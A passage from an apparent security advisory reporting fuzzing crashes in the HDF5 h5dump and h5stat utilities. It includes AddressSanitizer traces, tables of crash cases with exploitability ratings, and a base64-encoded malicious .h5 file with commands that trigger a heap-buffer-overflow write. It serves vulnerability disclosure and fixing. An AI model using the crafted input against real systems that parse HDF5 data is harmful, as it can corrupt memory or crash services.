#5 0x7f4b6130d00f in H5D_get_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dint.c:3569
#6 0x7f4b618ca8a4 in H5VL__native_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:466
#7 0x7f4b6189bcfa in H5VL__dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2426
#8 0x7f4b6189bcfa in H5VL_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2457
#9 0x7f4b6128f1e6 in H5Dget_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:776
#10 0x5568d72ae733 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29733)
#11 0x5568d72b7947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#12 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#13 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#14 0x7f4b61484212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#15 0x7f4b611fe721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#16 0x7f4b6120205e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#17 0x7f4b61492c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#18 0x7f4b6148b3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#19 0x7f4b61475d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#20 0x7f4b6152dc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#21 0x7f4b618d5455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#22 0x7f4b618ac095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#23 0x7f4b618ac095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#24 0x7f4b6151961a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#25 0x7f4b6151961a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#26 0x5568d72adbe4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#27 0x5568d72a61c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#28 0x7f4b60e30d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
Shadow bytes around the buggy address:
0x0c047fff8b10: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8b20: fa fa fd fa fa fa 00 03 fa fa 00 04 fa fa fd fd
0x0c047fff8b30: fa fa fd fd fa fa fd fa fa fa 00 fa fa fa fd fa
0x0c047fff8b40: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa fd fa
0x0c047fff8b50: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 04 fa
=>0x0c047fff8b60: fa fa 04 fa fa fa 00 00[fa]fa fa fa fa fa fa fa
0x0c047fff8b70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1090==ABORTING
H5T__conv_struct_opt Heap Buffer Overflow
Details
The following write-based heap overflow was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger an out-of-bounds write in the H5T__conv_struct_opt method. An attacker who can control an h5 file or other hdf5 data parsed by a target system can trigger the heap-overflow.
PoC
The following PoC shows the ASAN output detailing the heap-overflow location.
$ echo "H4sICAIuv2QAA2U5MmQ2YTY2Y2NlYjgyNGUzZmJmOTY5MGRlNGRmZDVkAOv0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRIcqHyY/A4mBhzgLViVh6tjAIhnABVVgNINbNh1wUwOCXJ1ZWBghNuHbq8FK4TmwDDgOTZTP2O3rQNE/MLlAxygnkT1eMEC0oxnR+XeQ+awkmbzf5L88Z+wEgoAE4MDbpv//3+CKcoI1MPIAk9PAoLAdMsIZMyAyidgqGcDyXOAFYE0ACEIbICmwwxGmDoBKP3//1Mg/Q+qnw8kDrTMyAAITA0tDU1NTEwNQQZKgI1kZAKRD/7/gGYeUIaCuG0CpuPfQBIyE9z1OD2PFzzFFPrfiSn0vx4WeQ2SDPJYTfpg79hgDKRPHAJip4BGZmgwNdhD5B/YO81GyBtMN2aAZPsGh1AwuGrvDOZD5EFykGAQcITov2DvgiQPCnIWiH6jWTNB4KS9K0T+4AuofkhiPuEIMf+ovRuSfhALEm0CTpNUPIHokL07TD7lhBPIbkhGcQGzGW4csPdAsx9SbjQ4yRwvBKI99p5o7ucE8xc5gd1XvdPeC0leE1j8BPv5uzACQwlW/rxALgdJLVFwASmQE8nS+QdEvMMUl6XANUjgJ8k6+AnIOxYVJVb6dwaXFJU2MJQWpRZDxaHZEp5FmBkSGEFiYsAEZAukE+PzEnNTCdkOzO3asDSnwJAE1cNCQJeggvxvZqgecQ4G8XwgKxmqF6PewdBrD1XjwGDCzWCKZADEN8gGoGZKRjEmcKlXn5yRWITsvaf/sZXCiXCWMBDLCcsxJILCEqgRHnhoAJxUYYVCCtA18vIMPEj+BFVwAKDQPF0YCAAA" | base64 -d | gunzip -c > e92d6a66cceb824e3fbf9690de4dfd5d
$ ./hdf5/bin/h5dump ./e92d6a66cceb824e3fbf9690de4dfd5d
HDF5 "./e92d6a66cceb824e3fbf9690de4dfd5d" {
GROUP "/" {
DATASET "ArrayO�Stru�" {
DATATYPE H5T_COMPOUND {
32-bit big-endian integer 32-bit precision "a_name";
24-bit little-endian floating-point 32-bit precision "b_name";
64-bit little-endian floating-point 64-bit precision "c_name";
H5T_COMPOUND {
H5T_STRING {
STRSIZE 1970974;
STRPAD H5T_STR_NULLTERM;
CSET H5T_CSET_ASCII;
CTYPE H5T_C_S1;
} "char_name";
96-bit big-endian integer 32-bit precision "array_na";
} "o";
}
DATASPACE SCALAR
=================================================================
==968==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1d2521ab40 at pc 0x7f1d299fc469 bp 0x7ffd71677900 sp 0x7ffd716770b0
WRITE of size 1970980 at 0x7f1d2521ab40 thread T0
#0 0x7f1d299fc468 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
#1 0x7f1d29557f58 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2642
#2 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#3 0x7f1d29558171 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
#4 0x7f1d2952387a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#5 0x7f1d29105b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
#6 0x7f1d290c3221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
#7 0x7f1d290f95d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
#8 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#9 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#10 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#11 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#12 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#13 0x556692a2546c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#14 0x556692a3a18d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#15 0x5566929f3c9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#16 0x5566929fc947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#17 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#18 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#19 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#20 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#21 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#22 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#23 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#24 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#25 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#26 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#27 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#28 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#29 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#30 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#31 0x5566929f2be4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#32 0x5566929eb1c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#33 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
#34 0x5566929ed649 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)
0x7f1d2521ab40 is located 0 bytes to the right of 1971008-byte region [0x7f1d25039800,0x7f1d2521ab40)
allocated by thread T0 here:
#0 0x7f1d29a6ce8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x7f1d292162ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
#2 0x7f1d292174f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
#3 0x7f1d290f6fa3 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1447
#4 0x7f1d290f941b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
#5 0x7f1d290f941b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
#6 0x7f1d296aeee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#7 0x7f1d2967eafc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#8 0x7f1d2967eafc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#9 0x7f1d2906da0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#10 0x7f1d29075444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#11 0x556692a2546c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#12 0x556692a3a18d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#13 0x5566929f3c9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#14 0x5566929fc947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#15 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#16 0x7f1d2925814e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#17 0x7f1d29269212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#18 0x7f1d28fe3721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#19 0x7f1d28fe705e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#20 0x7f1d29277c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#21 0x7f1d292703d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#22 0x7f1d2925ad71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#23 0x7f1d29312c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#24 0x7f1d296ba455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#25 0x7f1d29691095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#26 0x7f1d29691095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#27 0x7f1d292fe61a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#28 0x7f1d292fe61a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#29 0x5566929f2be4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#30 0x5566929eb1c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#31 0x7f1d28c15d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
0x0fe424a3b510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe424a3b520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe424a3b530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe424a3b540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe424a3b550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe424a3b560: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
0x0fe424a3b570: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe424a3b580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe424a3b590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe424a3b5a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe424a3b5b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==968==ABORTING
H5Stat Fuzzing
The following crashes were discovered by fuzzing the h5stat utility with AFL++.
| Filename | Summary | ASAN Summary |
|---|---|---|
30b688e7cbe565ec986c71489d772f84 |
READ of size 1 in H5F_get_checksums |
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Fio.c:556 in H5F_get_checksums |
317b9d862750b238f6eeacb04171e075 |
Invalid READ memory access on unknown address 0x000000000008 |
SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:7495 in H5VL_blob_specific |
36733df20ddc97273a6363f88815e7a7 |
Stack overflow caused by an infinite loop and stack exhaustion |
SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.c:304 in H5O__shared_decode |
367649861c56b0b2ee497bb8ef42ae0e |
READ of size 18 in H5T__conv_ref /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3780 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy |
39a0e73f7d0f7e396ccb09e826083bc2 |
Floating point error |
SUMMARY: AddressSanitizer: FPE /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Dchunk.c:695 in H5D__chunk_set_info_real |
4512b0fa12719efa790f5aac035f3e71 |
WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset |
57846c4fd17ff9378f0a44eaef3d5a11 |
negative-size-param: (size=-1) in H5O__link_decode /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Olink.c:209 |
SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy |
76a27427f63a1ca8e7b9acade505c983 |
Stack overflow caused by an infinite loop and stack exhaustion in in H5B__get_info_helper /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5B.c:1918 |
SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5C.c:2031 in H5C_protect |
8ebfabca399c9882144390c2824a9956 |
Stack oveflow caused by an infinite loop and stack exhaustion in H5G__visit_cb /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gint.c:1100 |
SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_stack.cpp:57 in __sanitizer::BufferedStackTrace::UnwindImpl(unsigned long, unsigned long, void*, bool, unsigned int) |
a8bf502b9051d547760292a54908d0de |
READ of size 272 in H5D__btree_idx_iterate_cb /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Dbtree.c:1047 |
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy |
b3358eb6912b440e85afbf1eaf8aab37 |
Stack overflow caused by an infinite loop and stack exhaustion in in H5O__dtype_shared_decode /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.h:60 |
SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Omessage.c:488 in H5O_msg_read_oh |
cc5fc6037ddcd3d5597e49a12e3ddf9d |
Floating point error |
SUMMARY: AddressSanitizer: FPE /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:3602 in H5T__complete_copy |
e008d3608912f88ae83aebe70689dcdf |
READ of size 8 located 24 bytes to the right of global variable 'FS_STRATEGY_NAME' defined in 'h5stat.c:38:13' |
SUMMARY: AddressSanitizer: global-buffer-overflow (/home/doi/src/triage/hdf5-1.14.1-2-ASAN/hdf5/bin/h5stat+0x1df8e) |
f93c69013478b5b9eab33f7412e947d1 |
Stack overflow caused by an infinite loop and stack exhaustion in H5E__push_stack /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Eint.c:765 |
SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_thread.cpp:410 in __asan::GetCurrentThread() |
ffb3610ce23ccaed3c1d45ce5c17f47b |
Stack overflow caused by an infinite loop and stack exhaustion |
SUMMARY: AddressSanitizer: stack-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Oshared.c:304 in H5O__shared_decode |
Further research regarding the practical exploitability of these issues was not performed. The following table details the output of the GDB Exploitable plugin, which has been included as an additional data point and is not intended to be used as commentary around real-world exploitability.
| Filename | Exploitability | Explanation |
|---|---|---|
367649861c56b0b2ee497bb8ef42ae0e |
UNKNOWN |
The target crashed due to an access violation but there is not enough additional information available to determine exploitability. |
39a0e73f7d0f7e396ccb09e826083bc2 |
PROBABLY_NOT_EXPLOITABLE |
The target crashed on a floating point exception. This may indicate a division by zero or a number of other floating point errors. It is generally difficult to leverage these types of errors to gain control of the processor. |
4512b0fa12719efa790f5aac035f3e71 |
PROBABLY_NOT_EXPLOITABLE |
The target crashed on an access violation at an address matching the source operand of the current instruction. This likely indicates a read access violation, which may mean the application crashed on a simple NULL dereference to data structure that has no immediate effect on control of the processor. |
57846c4fd17ff9378f0a44eaef3d5a11 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
76a27427f63a1ca8e7b9acade505c983 |
EXPLOITABLE |
GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable. |
8ebfabca399c9882144390c2824a9956 |
UNKNOWN |
The target crashed due to an access violation but there is not enough additional information available to determine exploitability. |
a8bf502b9051d547760292a54908d0de |
EXPLOITABLE |
The target crashed on a branch instruction, which may indicate that the control flow is tainted. |
b3358eb6912b440e85afbf1eaf8aab37 |
EXPLOITABLE |
GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable. |
cc5fc6037ddcd3d5597e49a12e3ddf9d |
PROBABLY_NOT_EXPLOITABLE |
The target crashed on a floating point exception. This may indicate a division by zero or a number of other floating point errors. It is generally difficult to leverage these types of errors to gain control of the processor. |
e008d3608912f88ae83aebe70689dcdf |
UNKNOWN |
The target crashed due to an access violation but there is not enough additional information available to determine exploitability. |
f93c69013478b5b9eab33f7412e947d1 |
EXPLOITABLE |
GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable. |
ffb3610ce23ccaed3c1d45ce5c17f47b |
EXPLOITABLE |
GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable. |
H5Dump Fuzzing
h5dump was fuzzed using the h5stat-input-corpus.tar.gz input corpus. The h5dump utility was not initially selected for fuzzing due to slower run times and issues with fuzzed test cases resulting in memory exhaustion and infinite loop conditions. These issues contributed to fewer total fuzzed test case executions against h5dump, and 10 million total test cases were executed. At the conclusion of testing, AFL++ was still finding new code paths and crashes. This indicates further issues are likely to be identified by continued fuzzing of h5dump.
A total of 89 unique memory corruption issues were discovered in h5dump based on stack major hashes. The following tables details the 35 memory corruption issues in h5dump which were classified by the exploitable plugin as exploitable, or potentially exploitable, for brevity. As with the h5stat tables above, this is not intended to provide commentary around real-world exploitability.
| Filename | Exploitability | Explanation |
|---|---|---|
07d6b324b8474a569ce13b34d919e125 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
0c9d1718599c629f6ae2dc253e9f556c |
EXPLOITABLE |
The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. |
0e71c9cac751ed2550aee102e2956181 |
EXPLOITABLE |
The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. |
0e847373645d83c271065efc23814701 |
PROBABLY_EXPLOITABLE |
The target crashed during a block move, which may indicate that the attacker can control a buffer overflow. |
11049a56a4235093e6845a27021af15e |
PROBABLY_EXPLOITABLE |
The target crashed during a block move, which may indicate that the attacker can control a buffer overflow. |
161b33e54715856dee6cc2036046d00b |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
21fcde769605d7419d5ddd86bcb2c0ab |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
2b99439e944dd50e495b73506a80c7cb |
PROBABLY_EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference. |
2c39afc2cd6c7e4a43a6133681d1284f |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
2ca00f445e035ee71f6efb7a0ed388dc |
PROBABLY_EXPLOITABLE |
The target crashed during a block move, which may indicate that the attacker can control a buffer overflow. |
38344f8077c3bdcc40d4c88cf1b67086 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
4030f62b172d41bffcaea19c3563f2d6 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
47a6f97d7f311db2fd03345389950c1b |
EXPLOITABLE |
The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. |
56351b62615dd0aee14cfff22670150b |
PROBABLY_EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference. |
56707228c5602b4f9032e5c5076ae951 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
6ad05b7df38db254d21dfc55bf055948 |
EXPLOITABLE |
The target crashed on a branch instruction, which may indicate that the control flow is tainted. |
6e4dd98178befb28af8863cacbc07093 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
6ff8b28467a0e30bbf353bf6621ed9d2 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
77d3cad25d20e9298344223c8d2d0eaa |
PROBABLY_EXPLOITABLE |
The target crashed during a block move, which may indicate that the attacker can control a buffer overflow. |
77e001f1dec920766158e041f2367b10 |
EXPLOITABLE |
The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable. |
95a688f817a2661a035eafbfa5bdb1ce |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
9823d45c52507c162d4aff86ea0e1960 |
EXPLOITABLE |
The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. |
